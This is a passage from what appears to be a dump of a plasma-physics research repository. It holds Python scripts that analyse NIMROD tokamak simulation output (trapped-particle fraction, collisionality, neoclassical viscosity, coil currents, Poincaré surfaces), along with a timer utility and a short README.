0.75*np.sum(weights*lam/intgr[0:nlam]) #Callen Eqn B5\n f_pass[1,ii] = 0.75*np.sum(weights*lam*intgr[nlam:2*nlam])\n f_pass[2,ii] = 0.75*np.sum(weights*lam/np.sqrt(1.0-lam*intgr[2*nlam]))\n eps[ii] = intgr[2*nlam+1]/rzo[0]\n f_pass[3,ii] = 1 + (-1.46 + 0.46*eps[ii])*np.sqrt(eps[ii])\n print(ii,dvar[1,ii],f_pass[:,ii])\n trapArr = [f_pass,eps]\n np.savez(trapfilename,*trapArr)\n f_trap = 1.0 - f_pass[:,:]\n\n################################################################################\n# Plot fsa quantities\n################################################################################\n ne = yvars[0,:iend]\n nd = yvars[1,:iend]\n ti = yvars[3,:iend]\n te = yvars[4,:iend]\n fsabsq = yvars[5,:iend]\n fsabdgrBsq = yvars[6,:iend]\n rbphi = yvars[7,:iend]\n omega = yvars[8,:iend]\n kpol = yvars[9,:iend]\n rhon = dvar[1,:iend]\n psi = dvar[2,:iend]\n psix = dvar[2,-1]\n q = np.fabs(dvar[7,:iend])\n bigr = bigr[:iend]\n #%\n\n rhoofq=interp1d(q,rhon)\n rhoq2=rhoofq(2)\n rhoq3=rhoofq(3)\n rhoq4=rhoofq(4)\n print(rhoq2,rhoq3,rhoq4)\n\n #pn.plot_scalar_line(None, q, flabel=r'q',\n # xvar=rhon, xlabel=r'$\\rho_N$', ylabel='',legend_loc='upper left')\n\n #%\n # Plot trapped fraction\n fig_size = [12,6.75]\n fig,ax = plt.subplots(figsize=fig_size)\n ax.axvline(rhoq2, ls=':')\n ax.axvline(rhoq3, ls=':')\n ax.axvline(rhoq4, ls=':')\n pn.plot_scalar_line(None, f_trap[0,:], flabel=r'$f_t$',\n f2=f_trap[3,:], f2label=r'$f_{t}$ approx',\n xvar=rhon, xlabel=r'$\\rho_N$', ylabel=r'$f_t$',\n style='varied',legend_loc='upper left',ax=ax)\n\n ft=interp1d(rhon,f_trap[0,:])\n ft_approx=interp1d(rhon,f_trap[3,:])\n print(f\"q={2} f_t = {ft(rhoq2)} f_t approx = {ft_approx(rhoq2)}\")\n print(f\"q={3} f_t = {ft(rhoq3)} f_t approx = {ft_approx(rhoq3)}\")\n print(f\"q={4} f_t = {ft(rhoq4)} f_t approx = {ft_approx(rhoq4)}\")\n\n # Plot fsa quants\n #pn.plot_scalar_line(None, fsabsq, flabel=r'\\langle B^2 \\rangle',\n # xvar=rhon, xlabel=r'\\rho_N', ylabel='',legend_loc='upper left')\n #pn.plot_scalar_line(None, fsabdgrBsq, flabel=r'\\langle(\\mathbf{b}\\cdot\\nabla B)^2\\rangle',\n # xvar=rhon, xlabel=r'\\rho_N', ylabel='',legend_loc='upper right')\n fsa_approx = eps**2/(2*rzo[0]**2*q**2)\n #pn.plot_scalar_line(None, fsabdgrBsq/fsabsq,\n # flabel=r'\\langle(\\mathbf{b}\\cdot\\nabla B)^2\\rangle/\\langle B^2 \\rangle',\n # f2=fsa_approx, f2label='\\epsilon^2/(2 R_0^2 q^2)',\n # xvar=rhon, xlabel=r'\\rho_N', ylabel='m^{-2}',legend_loc='upper right')\n\n fig_size = [12,6.75]\n fig,ax = plt.subplots(figsize=fig_size)\n ax.axvline(rhoq2, ls=':')\n ax.axvline(rhoq3, ls=':')\n ax.axvline(rhoq4, ls=':')\n pn.plot_scalar_line(None, eps, flabel=r'$\\epsilon$',\n xvar=rhon, xlabel=r'$\\rho_N$', ylabel='',\n legend_loc='upper right',ax=ax)\n\n eps_int=interp1d(rhon,f_trap[0,:])\n print(f\"q={2} $\\epsilon$ = {eps_int(rhoq2)}\")\n temp = 1.46 * np.sqrt(.242)-0.46*np.power(.242,1.5)\n print(f\"using epsilon b f_t = {temp} at q=2\")\n #%# computed quantities\n #%### nustar ###\n #%\n\n for species in ['ion','electron']:\n lnLambda=24.-np.log(np.sqrt(ne/10**6)/te)\n sqrt2 = np.sqrt(2)\n if species == 'ion':\n z = 0.0\n ms=md\n ts=ti\n ns=nd\n nu_coef = 4.0 * np.sqrt(np.pi) * echrg**4 * lnLambda \\\n /((4.0 * np.pi * eps0)**2 * kb**1.5 * 3.0 * np.sqrt(md))\n eta_coef = 5/(sqrt2*12.0)*(205.0/(48.0*sqrt2))/(89/48) #z_star =0\n nustauss = 1.0/sqrt2\n elif species == 'electron':\n z = 1.0\n ms=me\n ts=te\n ns=ne\n nu_coef = 4.0 * np.sqrt(2*np.pi) * echrg**4 * lnLambda \\\n /((4.0 * np.pi * eps0)**2 * kb**1.5 * 3.0 * np.sqrt(me))\n\n eta_coef = 5/12.0 * \\\n (17./4.*z**2+205*z/(48*sqrt2))/ \\\n (2*z**2+301*z/(48*sqrt2)+89/48)\n nustauss = z\n else:\n print(\"species unknown\")\n raise ValueError\n nu_s=nu_coef * ns/np.sqrt(ts**3)\n vt_s = np.sqrt(ts*kb/ms)\n lambda_s = vt_s/nu_s\n eta00_s = ms*ns*nu_s*lambda_s**2 # A17\n\n D = 1.2 * (2* np.power(z,2) + 301/(48.*sqrt2)*z+89./48.)\n\n\n\n\n # plot parallel viscosity as a diffusivity\n # pn.plot_scalar_line(None, eta00_s/(md*nd), flabel=r'\\eta^s_{00}/(m_d n_d)',\n # xvar=rhon, xlabel=r'\\rho_N', ylabel='m^2/s', legend_loc='upper right')\n\n omegat_s = vt_s/(rzo[0]*q) # B10\n nustar_s = f_trap[0,:]/(2.92*f_pass[0,:]) * nu_s*omegat_s/vt_s**2 * fsabsq/fsabdgrBsq # B11\n nustar_s_aprx = nu_s*rzo[0]*q/(eps**(1.5)*vt_s) #\n #%\n\n\n # plot nustar\n if species=='ion':\n flabel=r'$\\nu_{*i}$'\n else:\n flabel=r'$\\nu_{*e}$'\n fig,ax = plt.subplots(figsize=fig_size)\n ax.axvline(rhoq2, ls=':')\n ax.axvline(rhoq3, ls=':')\n ax.axvline(rhoq4, ls=':')\n ax.axhline(y=1.0, ls='--',color='k')\n ax.set_ylim([0,10])\n pn.plot_scalar_line(None, nustar_s, flabel=flabel,\n f2=eps**(-1.5), f2label=r'$\\epsilon^{-3/2}$',\n xvar=rhon, xlabel=r'$\\rho_N$', ylabel='',\n style='varied',legend_loc='upper right',ax=ax)\n\n nut=interp1d(rhon,nustar_s)\n nut_approx=interp1d(rhon,nustar_s_aprx)\n print(f\"q={2} nu_* = {nut(rhoq2)} nu_* approx = {nut_approx(rhoq2)}\")\n print(f\"q={3} nu_* = {nut(rhoq3)} nu_* approx = {nut_approx(rhoq3)}\")\n print(f\"q={4} nu_* = {nut(rhoq4)} nu_* approx = {nut_approx(rhoq4)}\")\n\n ### NC ion poloidal flow ###\n\n\n\n tauss = nustauss/nu_s\n\n K00B_s = (z + sqrt2-np.log(1+sqrt2))/nustauss\n\n K01B_s = (z + 1.0/sqrt2)/nustauss # isn't this just 1?\n K11B_s = (2.0*z + 9.0/(4.0*sqrt2))/nustauss\n K00P_s = np.sqrt(np.pi)\n K01P_s = 3 * np.sqrt(np.pi)\n K11P_s = 12 * np.sqrt(np.pi)\n K00PS_s = (17.0*z/4.0 + 205.0/(sqrt2*48.0))/D\n K01PS_s = (7.0/2.0)*(23.0*z/4.0 + 241.0/(sqrt2*48.0))/D\n K11PS_s = (49.0/4.0)*(33.0*z/4.0 + 325.0/(sqrt2*48.0))/D\n\n K00tot_s = K00B_s/(1.0 + np.sqrt(nustar_s) + 2.92*nustar_s*K00B_s/K00P_s) \\\n /(1.0 + 2.0*K00P_s/(3.0*omegat_s*tauss*K00PS_s))\n K01tot_s = K01B_s/(1.0 + np.sqrt(nustar_s) + 2.92*nustar_s*K01B_s/K01P_s) \\\n /(1.0 + 2.0*K01P_s/(3.0*omegat_s*tauss*K01PS_s))\n K11tot_s = K11B_s/(1.0 + np.sqrt(nustar_s) + 2.92*nustar_s*K11B_s/K11P_s) \\\n /(1.0 + 2.0*K11P_s/(3.0*omegat_s*tauss*K11PS_s))\n\n muiratio = 5.0/2.0 - K01tot_s/K00tot_s\n# mu00_s = K00tot_s * nu_s * tauss * f_trap[0,:]/f_pass[0,:] #TODO\n\n mu00_s = K00tot_s * nu_s * f_trap[0,:]/f_pass[0,:] #TODO remove tauss\n mu00_s_norm = K00tot_s* f_trap[0,:]/f_pass[0,:]\n\n\n if species=='ion':\n flabel=r'$\\mu_{i}$'\n else:\n flabel=r'$\\mu_{e}$'\n fig_size = [12,6.75]\n fig,ax = plt.subplots(figsize=fig_size)\n ax.axvline(rhoq2, ls=':')\n ax.axvline(rhoq3, ls=':')\n ax.axvline(rhoq4, ls=':')\n pn.plot_scalar_line(None, mu00_s, flabel=flabel,\n xvar=rhon, xlabel=r'$\\rho_N$', ylabel=r'Damping Frequency [1/s]',\n legend_loc='upper left',ax=ax)\n\n\n mus=interp1d(rhon,mu00_s)\n mus_norm=interp1d(rhon,mu00_s_norm)\n print(f\"q={2} mu_s = {mus(rhoq2)} mu_s/nu approx = {mus_norm(rhoq2)}\")\n print(f\"q={3} mu_s = {mus(rhoq3)} mu_s/nu approx = {mus_norm(rhoq3)}\")\n print(f\"q={4} mu_s = {mus(rhoq4)} mu_s/nu approx = {mus_norm(rhoq4)}\")\n\n# mu01_s = 5.0/2.0*K00tot_s - K01tot_s\n# mu11_s = K11tot_s - 5.0*K01tot_s + 25.0/4.0*K00tot_s\n# nu11_s = sqrt2 # lots of assumptions here\n\n\n\n\n\n\n\n # Setup FSA quants spline as function of rhon\n #zvars = np.zeros((2, )+yvars.shape) # psin,q + yvars\n #zvars[0,:] = dvar[0,:] # psin\n #zvars[1,:] = dvar[7,:] # q\n #zvars[2:,:] = yvars[:,:]\n #splrho = interp1d(rhon, zvars, kind='cubic')\n\n #pn.plot_scalar_line(None, yvars[0,:], flabel=r'p', xvar=dvar[1,:], ylabel=r'pressure (Pa)', xlabel=r'\\rho_N', legend_loc='upper right')\n #pn.plot_scalar_line(None, yvars[1,:], flabel=r'n', xvar=dvar[1,:], ylabel=r'density (m^{-3})', xlabel=r'\\rho_N', legend_loc='upper right')\n\n ##2D plots -- forces\n #xres=250; yres=250 # need y=1000\n #grid = pn.grid_2d_gen([1.14, -1.19, 0], [1.14, 1.02, 0], [2.31, -1.19, 0], xres, yres)\n #\n #maskfilename = 'mask'+str(xres)+'x'+str(yres)+'.npy'\n #if os.path.exists(maskfilename):\n # mask = np.load(maskfilename)\n #else:\n # mask = np.zeros((1,grid.shape[1],grid.shape[2]))\n # for ix in range(grid.shape[1]):\n # for iy in range(grid.shape[2]):\n # if contourContains(Rsep,Zsep,grid[0,ix,iy],grid[1,ix,iy]):\n # mask[0,ix,iy] = 1.0\n # else:\n # mask[0,ix,iy] = np.nan\n # np.save(maskfilename,mask)\n #\n ##fval = eval_nimrod.eval_field('ti', grid, dmode=0, eq=2)\n ##ti = Scalar(fval, grid, torgeom=gmt, dmod=0)\n ##fval = eval_nimrod.eval_field('n', grid, dmode=1, eq=2)\n ##ne = Scalar(fval, grid, torgeom=gmt, dmod=1, nqty=0)\n ##nd = Scalar(fval, grid, torgeom=gmt, dmod=1, nqty=1)\n ##nc = Scalar(fval, grid, torgeom=gmt, dmod=1, nqty=2)\n #fval = eval_nimrod.eval_field('v', grid, dmode=2, eq=2)\n #v = Vector(fval, grid, torgeom=gmt, dmod=2)\n #fval = eval_nimrod.eval_field('b', grid, dmode=1, eq=2)\n #B = Vector(fval, grid, torgeom=gmt, dmod=1)\n #\n #divv = 2.0/3.0 * div(v)\n #pn.plot_scalar_plane(grid, mask[0]*divv.data, ax=setBdryPlot())\n #BdcvcB = B.dot( curl( v.cross(B) ) ) / B.dot(B)\n #pn.plot_scalar_plane(grid, mask[0]*BdcvcB.data, ax=setBdryPlot())\n #PiParFast = BdcvcB + divv\n #pn.plot_scalar_plane(grid, mask[0]*PiParFast.data, ax=setBdryPlot(), fmin=-10000., fmax=10000.)\n\n # 1D force-balance test\n grid = pn.grid_1d_gen([1.76821, -0.0188439, 0], [2.7, -0.0188439, 0], 1000)\n fval = eval_nimrod.eval_field('p', grid, dmode=2, eq=1)\n p = Scalar(fval, grid, torgeom=gmt, dmod=2)\n fval = eval_nimrod.eval_field('b', grid, dmode=1, eq=1)\n B = Vector(fval, grid, torgeom=gmt, dmod=1)\n fval = eval_nimrod.eval_field('j', grid, dmode=1, eq=1)\n j = Vector(fval, grid, torgeom=gmt, dmod=1)\n fval = eval_nimrod.eval_field('v', grid, dmode=1, eq=1)\n v = Vector(fval, grid, torgeom=gmt, dmod=1)\n fval = eval_nimrod.eval_field('n', grid, dmode=1, eq=1)\n nd = Scalar(fval, grid, torgeom=gmt, dmod=1, nqty=1)\n fval = eval_nimrod.eval_field('ti', grid, dmode=1, eq=1)\n ti = Scalar(fval, grid, torgeom=gmt, dmod=1)\n #nc = Scalar(fval, grid, torgeom=gmt, dmod=1, nqty=2)\n # computed quantities\n jxb=j.cross(B)\n grp=p.grad()\n mc=1.9944235e-26\n #rhovdgrdv = (md*nd+mc*nc)*v.dot(grad(v))\n rhovdgrdv = (md*nd)*v.dot(grad(v))\n\n force=jxb-grp\n# pn.plot_vector_line(grid, force.data, flabel=r'Force', f2=jxb.data,\n# f2label=r'$J\\times B$',\n# f3=grp.data, f3label=r'$\\nabla p$',\n# f4=rhovdgrdv.data, f4label=r'$v\\cdot \\nabla v$',\n# comp='perp', style='varied',\n# legend_loc='lower left', ylabel=r'Force density N/m^3')\n\n# pn.plot_scalar_line(grid, ti.data, flabel=r'T_i', style='varied',\n# legend_loc='lower left', ylabel=r'Temperature eV')\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description='Perform mu calculations from UW-CPTC-09-6R'\n )\n parser.add_argument('file',help='dumpfile',default='dumpgll.00000.h5')\n args = vars(parser.parse_args())\n neoclassical_calculator(dumpfile=args['file'])\n" }, { "alpha_fraction": 0.6500920653343201, "alphanum_fraction": 0.6519337296485901, "avg_line_length": 19.923076629638672, "blob_id": "11a46590f518776f213f115350a3e9ff83530f90", "content_id": "deb05fd11db8a9e168828ce43f206608036c08f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 543, "license_type": "no_license", "max_line_length": 74, "num_lines": 26, "path": "/surfmnNim/README.md", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "# surfmnNim\nA collection of scripts for generating surface mn plots from NIMROD output\nThese scripts were developed by Matt Beidler. \n\n## Inputs\n - fgProfs binary\n - xy_slice binary\n \n## Outputs\n - Numerous profile slices\n - Pretty Surface MN plots\n - Possibly more (not sure)\n \n## Key Steps\n - Not sure \n \n## Status of the code\n - Code runs\n \n## Todo\n - [ ] Run the code and figure out how it works\n - [ ] Update to be python 3 compliant\n - [ ] camelCase the code\n - [ ] Use the code to make pretty pictures\n - [ ] ...\n - [ ] Profit" }, { "alpha_fraction": 0.6325757503509521, "alphanum_fraction": 0.6780303120613098, "avg_line_length": 19.30769157409668, "blob_id": "0d4acfe87be6d8bcf725b4c3e2c82b5e612c8639", "content_id": "49d37ce919ad60b3860f13b265dcdd05c64204bd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 792, "license_type": "no_license", "max_line_length": 61, "num_lines": 39, "path": "/random/bump_pulse.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\n#\n# Input files:\n# Ouput file:\n\n\nimport numpy as np\nimport sys\nimport matplotlib.pyplot as plt\n\n\ndef bump_function(amp,time,time_scale,time_offset):\n t_norm = (time-time_offset)/time_scale\n t_norm_sq = t_norm * t_norm\n if t_norm_sq >= 1.0:\n return 0.0\n else:\n return amp*np.exp(- 1.0/(1.0-t_norm_sq))\n\n\namp = 1.0\nt_scale = 0.50\nt_offset = 0.505\nnpts = 1000\n\ntime = np.linspace(0,10*t_offset,npts)\nbump = np.zeros([npts])\nfor it, tt in enumerate(time):\n bump[it] = bump_function(amp,tt,t_scale,t_offset)\n\nfig =plt.figure(figsize=(8,6))\nax = fig.add_subplot(111)\nax.set_title(\"Magnetic Perturbation Pulse Shape\",fontsize=18)\nax.plot(time,bump)\nax.set_xlabel(\"Time [ms]\",fontsize=18)\nax.set_ylabel(\"Amplitude [A.U.]\",fontsize=18)\nplt.tight_layout()\nplt.show()\n" }, { "alpha_fraction": 0.5308270454406738, "alphanum_fraction": 0.5323308110237122, "avg_line_length": 24.909090042114258, "blob_id": "652c114ba219930c05e8b656ece769e72a5576ce", "content_id": "1231ea2f58162278fcb642796583696e50b01b64", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1995, "license_type": "no_license", "max_line_length": 59, "num_lines": 77, "path": "/mre_analysis/nim_timer.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport time\nimport functools\n\nclass timeObject:\n def __init__(self,name):\n self.__start=None\n self.__elapsed=0.0\n self.__name=name\n \n def start(self):\n if self.__start is not None:\n print(f\"{self.__name} timer was not reset\")\n raise ValueError\n self.__start=time.time()\n return None\n \n def stop(self):\n end=time.time()\n if self.__start is None:\n print(f\"{self.__name} timer was never started\")\n raise ValueError\n self.__elapsed+=(end-self.__start)\n self.__start=None\n return None\n \n def get_elpased(self):\n return self.__elapsed\n \n def print_time(self):\n print(f\"{self.__name}: {self.__elapsed}s\")\n return None\n \nclass nimTimer:\n ''' A timer class for profiling python scripts '''\n def __init__(self):\n self.__ids={}\n \n def start(self,id):\n if id in self.__ids:\n self.__ids[id].start()\n else:\n self.__ids[id]=timeObject(id)\n self.__ids[id].start()\n return None\n \n def stop(self,id):\n if id not in self.__ids:\n print(f\"{id} not found in nimTime\")\n raise Keyerror\n self.__ids[id].stop()\n return None\n\n def get_elapsed(self,id):\n if id not in self.__ids:\n print(f\"{id} not found in nimTime\")\n raise Keyerror\n return self.__ids[id].get_elapsed()\n \n def print_times(self):\n for val in self.__ids.values():\n val.print_time()\n return None\n\ntimer=nimTimer()\n\ndef timer_func(func):\n '''function wrapper to use nimTimer as a decorator\n use: @nim_timer.timer_func before function def\n '''\n @functools.wraps(func)\n def wrapper(*args,**kwargs):\n timer.start(func.__name__)\n result=func(*args,**kwargs)\n timer.stop(func.__name__)\n return result\n return wrapper\n" }, { "alpha_fraction": 0.560079038143158, "alphanum_fraction": 0.6304348111152649, "avg_line_length": 29.636363983154297, "blob_id": "874e88ddc0dfefab380fb4c809872f34ee2ca554", "content_id": "3d3408fa33c8e2d8ce8e8016e621b1941ce41334", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5060, "license_type": "no_license", "max_line_length": 68, "num_lines": 165, "path": "/plotingScripts/freeBdryPlts.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\nhomeDir = os.environ['HOME']\n\nfname=homeDir + \"/SCRATCH/d4d/poster/fbdry.txt\"\ndata = np.loadtxt(fname)\n\ntitle = \"Shape Error (Controller not reset)\"\nymin=1.0e-4\nymax=1\n\nncoils = int(max(data[:,1]))\nits = data.shape[0]/ncoils\nprint its\n\n\nstep = np.zeros(its)\nic0 = np.zeros([its,ncoils])\nic = np.zeros([its,ncoils])\nchisq = np.zeros(its)\n\nfor ii in range(0, data.shape[0], ncoils):\n it = int(ii/ncoils)\n step[it] = data[ii,0]\n chisq[it] = data[ii,6]\n for jj in range(ncoils):\n ic0[it,jj] = data[ii+jj,2]/1e6\n ic[it,jj] = data[ii+jj,5]/1e6\n \nict=ic0+ic\n\n\n\nmaxplt = step.size \nfig, ax1 = plt.subplots()\nax1.plot(step[0:maxplt], chisq[0:maxplt]/100, 'b-')\n#ax1.vlines(25,ymin,ymax,linestyle='dotted')\n#ax1.vlines(50,ymin,ymax,linestyle='dotted')\n#ax1.vlines(75,ymin,ymax,linestyle='dotted')\nax1.set_xlabel(r'GS Iteration',fontsize=16)\n#ax1.axes.set_xlim(left=0,right=1)\n\n# Make the y-axis label, ticks and tick labels match the line color.\nax1.set_ylabel(r'$\\chi^2$ Error',rotation=90,fontsize=16)\nax1.axes.set_ylim(ymin,ymax)\n#ax1.axes.set_ylim(0,1)\nplt.yscale(\"log\")\nax1.tick_params(axis='both', which='major', labelsize=14)\n#plt.locator_params(axis='y', nbins=6)\nfig.tight_layout()\nplt.title(title)\nplt.show() \n\n#inital current\n\nfig, ax1 = plt.subplots()\nax1.plot(step[0:maxplt], ic0[0:maxplt,0], '-')\n#ax1.plot(step, ic0[:,1], '-')\nax1.plot(step[0:maxplt], ic0[0:maxplt,2], '-')\n#ax1.plot(step, ic0[0:maxplt,3], '-')\nax1.plot(step[0:maxplt], ic0[0:maxplt,4], '-')\n#ax1.plot(step, ic0[:,5], '-')\nax1.plot(step[0:maxplt], ic0[0:maxplt,6], '-')\n#ax1.plot(step, ic0[:,7], '-')\nax1.plot(step[0:maxplt], ic0[0:maxplt,8], '-')\n#ax1.plot(step, ic0[:,9], '-')\nax1.plot(step[0:maxplt], ic0[0:maxplt,10], '-')\n#ax1.plot(step, ic0[:,11], '-')\nax1.plot(step[0:maxplt], ic0[0:maxplt,12], '-')\n#ax1.plot(step, ic0[:,13], '-')\nax1.plot(step[0:maxplt], ic0[0:maxplt,14], '-')\n#ax1.plot(step, ic0[:,15], '-')\nax1.plot(step[0:maxplt], ic0[0:maxplt,16], '-')\n#ax1.plot(step, ic0[:,17], '-')\n\nax1.set_xlabel(r'GS Iteration',fontsize=16)\n#ax1.axes.set_xlim(left=0,right=1)\n\n# Make the y-axis label, ticks and tick labels match the line color.\nax1.set_ylabel(r'Inital $I_c$ [MA]',rotation=90,fontsize=16)\n#ax1.axes.set_ylim(0,1)\nax1.tick_params(axis='both', which='major', labelsize=14)\nplt.locator_params(axis='y', nbins=6)\nfig.tight_layout()\n\nplt.show() \n\n#inital current\n\nfig, ax1 = plt.subplots()\nax1.plot(step[0:maxplt], ic[0:maxplt,0], '-')\n#ax1.plot(step, ic[:,1], '-')\nax1.plot(step[0:maxplt], ic[0:maxplt,2], '-')\n#ax1.plot(step, ic[:,3], '-')\nax1.plot(step[0:maxplt], ic[0:maxplt,4], '-')\n#ax1.plot(step, ic[:,5], '-')\nax1.plot(step[0:maxplt], ic[0:maxplt,6], '-')\n#ax1.plot(step, ic[:,7], '-')\nax1.plot(step[0:maxplt], ic[0:maxplt,8], '-')\n#ax1.plot(step, ic[:,9], '-')\nax1.plot(step[0:maxplt], ic[0:maxplt,10], '-')\n#ax1.plot(step, ic[:,11], '-')\nax1.plot(step[0:maxplt], ic[0:maxplt,12], '-')\n#ax1.plot(step, ic[:,13], '-')\nax1.plot(step[0:maxplt], ic[0:maxplt,14], '-')\n#ax1.plot(step, ic[:,15], '-')\nax1.plot(step[0:maxplt], ic[0:maxplt,16], '-')\n#ax1.plot(step, ic[:,17], '-')\n\nax1.set_xlabel(r'GS Iteration',fontsize=16)\n#ax1.axes.set_xlim(left=0,right=1)\n\n# Make the y-axis label, ticks and tick labels match the line color.\nax1.set_ylabel(r'$\\delta I_c$ [MA]',rotation=90,fontsize=16)\n#ax1.axes.set_ylim(0,1)\nax1.tick_params(axis='both', which='major', labelsize=14)\nplt.locator_params(axis='y', nbins=6)\nfig.tight_layout()\n\nplt.show() \n\n#totla current\n\nfig, ax1 = plt.subplots()\nax1.plot(step[0:maxplt], ict[0:maxplt,0], '-')\nax1.plot(step[0:maxplt], ict[0:maxplt,2], '-')\n#ax1.plot(step, ic[:,3], '-')\nax1.plot(step[0:maxplt], ict[0:maxplt,4], '-')\n#ax1.plot(step, ic[:,5], '-')\nax1.plot(step[0:maxplt], ict[0:maxplt,6], '-')\n#ax1.plot(step, ic[:,7], '-')\nax1.plot(step[0:maxplt], ict[0:maxplt,8], '-')\n#ax1.plot(step, ic[:,9], '-')\nax1.plot(step[0:maxplt], ict[0:maxplt,10], '-')\n#ax1.plot(step, ic[:,11], '-')\nax1.plot(step[0:maxplt], ict[0:maxplt,12], '-')\n#ax1.plot(step, ic[:,13], '-')\nax1.plot(step[0:maxplt], ict[0:maxplt,14], '-')\n#ax1.plot(step, ic[:,15], '-')\nax1.plot(step[0:maxplt], ict[0:maxplt,16], '-')\n#ax1.plot(step, ic[:,17], '-')\nax1.plot(step[0:maxplt], ict[0:maxplt,1], '-')\nax1.plot(step[0:maxplt], ict[0:maxplt,3], '-')\nax1.plot(step[0:maxplt], ict[0:maxplt,5], '-')\nax1.plot(step[0:maxplt], ict[0:maxplt,7], '-')\nax1.plot(step[0:maxplt], ict[0:maxplt,9], '-')\nax1.plot(step[0:maxplt], ict[0:maxplt,11], '-')\nax1.plot(step[0:maxplt], ict[0:maxplt,13], '-')\nax1.plot(step[0:maxplt], ict[0:maxplt,15], '-')\nax1.plot(step[0:maxplt], ict[0:maxplt,17], '-')\n\n\nax1.set_xlabel(r'GS Iteration',fontsize=16)\n#ax1.axes.set_xlim(left=0,right=1)\n\n# Make the y-axis label, ticks and tick labels match the line color.\nax1.set_ylabel(r'$I_c$ [MA]',rotation=90,fontsize=16)\n#ax1.axes.set_ylim(0,1)\nax1.tick_params(axis='both', which='major', labelsize=14)\nplt.locator_params(axis='y', nbins=6)\nfig.tight_layout()\n\nplt.show() " }, { "alpha_fraction": 0.5990534424781799, "alphanum_fraction": 0.6855983734130859, "avg_line_length": 24.06779670715332, "blob_id": "cded119817ebfbb07faf53dd464db5e7082b794e", "content_id": "c91fcc110aad649ddcafb373f2a762257d7fb977", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1479, "license_type": "no_license", "max_line_length": 69, "num_lines": 59, "path": "/plotingScripts/drawpss.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math as m\nimport os\n\nhomeDir = os.environ['HOME']\nrelDir = \"/SCRATCH/174446_novac_debug/nonlin1_eq26_bamp3_nimfl/4000/\"\nfileName = \"nimfl0004000.dat\"\n\nfullFile = homeDir+relDir+fileName\ndata = np.loadtxt(fullFile)\nsizes=0.005\nsizes2=0.05\n\nsurfaces = []\nn3m1 = [53,63,66,97,98,100,116,139,236,240,264,276,283,287]\nn2m1 = [94,109,170,199,252]\nprint(data.shape)\nlast_surface = -1\nn_surface = 0\nfor ii in range(data.shape[0]):\n if data[ii,3]== last_surface:\n n_surface = n_surface+1\n else:\n if n_surface > 0:\n this_surface = np.zeros([n_surface,2])\n this_surface = data[i_start:ii,0:2]\n surfaces.append(this_surface)\n i_start = ii\n n_surface = 1\n last_surface = data[ii,3]\nthis_surface = data[i_start:,0:2]\nsurfaces.append(this_surface)\n\nprint(len(surfaces))\nlastl =0.0\nnskip=20\n\n\nfig=plt.figure(figsize=(4,6))\nax = fig.add_subplot(111)\nfor i_surface in range(0,len(surfaces),nskip):\n this_surface = surfaces[i_surface]\n ax.scatter(this_surface[:,0],this_surface[:,1],s=sizes,c='k')\nfor i_surface in n3m1:\n this_surface = surfaces[i_surface]\n ax.scatter(this_surface[:,0],this_surface[:,1],s=sizes2)\nfor i_surface in n2m1:\n this_surface = surfaces[i_surface]\n ax.scatter(this_surface[:,0],this_surface[:,1],s=sizes2)\n\n \nax.set_xlabel(r\"$R$\", size=16)\nax.set_ylabel(r\"$Z$\",size=16,rotation=0)\nplt.axis('equal')\nax.set_xlim([1,2.5])\nplt.tight_layout()\nplt.show()\n" }, { "alpha_fraction": 0.44662681221961975, "alphanum_fraction": 0.4925277531147003, "avg_line_length": 37.60439682006836, "blob_id": "30effc41bf245d65f3a29227464decc9e83b0ffd", "content_id": "20b21f48b0718c102502411db319dc5b6fbfe7dd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14052, "license_type": "no_license", "max_line_length": 87, "num_lines": 364, "path": "/hocradic/hcStep.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport eval_nimrod as eval\nimport plot_nimrod as pn\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\nimport h5py\nimport numpy as np\nimport pickle\nimport hcFields as hc\nimport nim_timer as timer\n\nclass hcstep:\n def __init__(self,dumpfile,nimrodin):\n self.dumpfile=dumpfile\n self.nimrodin=nimrodin\n self.fields=hc.hcfields(dumpfile,nimrodin)\n self.time=None\n self.step=None\n self.eval=None\n self.energyDict={}\n self.powerDict={}\n self.volume=None\n self.grid=None\n self.intSet=False\n self.intWeight=np.empty([1])\n\n def dump(self,file):\n pickle.dump(self.dumpfile,file)\n pickle.dump(self.nimrodin,file)\n pickle.dump(self.time,file)\n pickle.dump(self.step,file)\n pickle.dump(self.energyDict,file)\n pickle.dump(self.powerDict,file)\n pickle.dump(self.volume,file)\n\n def load(self,file):\n with open(file,'rb') as pickle_file:\n self.dumpfile=pickle.load(pickle_file)\n self.nimrodin=pickle.load(pickle_file)\n self.time=pickle.load(pickle_file)\n self.step=pickle.load(pickle_file)\n self.energyDict=pickle.load(pickle_file)\n self.powerDict=pickle.load(pickle_file)\n self.volume=pickle.load(pickle_file)\n\n def set_3dgrid(self,rmin,rmax,zmin,zmax,nr,nz,lphi,nonlin_order=2,debug=0):\n '''sets up a 3d grid, using non to determine the number of phi planes\n based on\n '''\n self.nmodes=self.calc_nmodes(lphi)\n self.nmax=self.nmodes-1\n nphi=self.calc_nplanes(lphi)\n phimax=np.pi*2*(nphi-1)/nphi\n p1 = np.array([rmin, zmin, 0.0])\n p2 = np.array([rmax, zmin, 0.0])\n p3 = np.array([rmin, zmax, 0.0])\n p4 = np.array([rmin, zmin, phimax])\n rzp3d = pn.PlotNimrod.grid_3d_gen(p1, p2, p3, p4, nr, nz,nphi)\n self.fields.grid=eval.EvalGrid(rzp3d)\n 